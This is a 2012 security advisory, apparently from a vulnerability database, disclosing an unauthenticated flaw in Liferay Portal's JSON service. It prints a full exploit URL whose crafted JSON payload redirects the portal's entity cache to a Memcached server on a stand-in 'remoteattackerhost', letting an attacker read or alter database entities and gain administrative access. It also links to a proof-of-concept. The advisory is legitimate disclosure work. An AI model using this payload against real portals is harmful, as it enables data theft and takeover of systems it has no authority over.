Specially crafted Json service request allows full control over a Liferay portal instance

2012-04-23T00:00:00
ID SECURITYVULNS:DOC:27949
Type securityvulns
Reporter Securityvulns
Modified 2012-04-23T00:00:00

Description

Specially crafted Json service request allows full control over a Liferay portal instance

Description:

Liferay Portal is an enterprise portal written in Java

By doing a single http request you can reconfigure Liferay to use a remote Memcached cache instead of it's own cache.

http://vulnerablehost/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil&serviceMethodName=updatePortrait&serviceParameters=[%22userId%22%2C%22bytes%22]&userId=1&bytes={"class":"com.liferay.portal.kernel.dao.orm.EntityCacheUtil","entityCache":{"class":"com.liferay.portal.dao.orm.common.EntityCacheImpl","multiVMPool":{"class":"com.liferay.portal.cache.MultiVMPoolImpl","portalCacheManager":{"class":"com.liferay.portal.cache.memcached.MemcachePortalCacheManager","timeout":60,"timeoutTimeUnit":"SECONDS","memcachedClientPool":{"class":"com.liferay.portal.cache.memcached.DefaultMemcachedClientFactory","connectionFactory":{"class":"net.spy.memcached.BinaryConnectionFactory"},"addresses":["remoteattackerhost:11211"]}}}}}

This means that all entities stored in the database will now be cached in a Memcached instance hosted on the attackers host, where they can be retrieved or manipulated at will by the attacker. A moderately skilled attacker could leverage this to gain administrative access to the system. The attacker does not need to have an account on the portal in order to execute this attack

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-26558-proof

Systems affected:

Liferay 6.1 ce is confirmed to be vulnerable Liferay 6 ee service servicepack 2 is most likely vulnerable Liferay 6.1 ee is most likely vulnerable

Vendor status :

Liferay was notified april 6 2012 by filing a bug in their public bugtracker under issue number LPS-26558. The issue has since been flagged as private and has been resolved.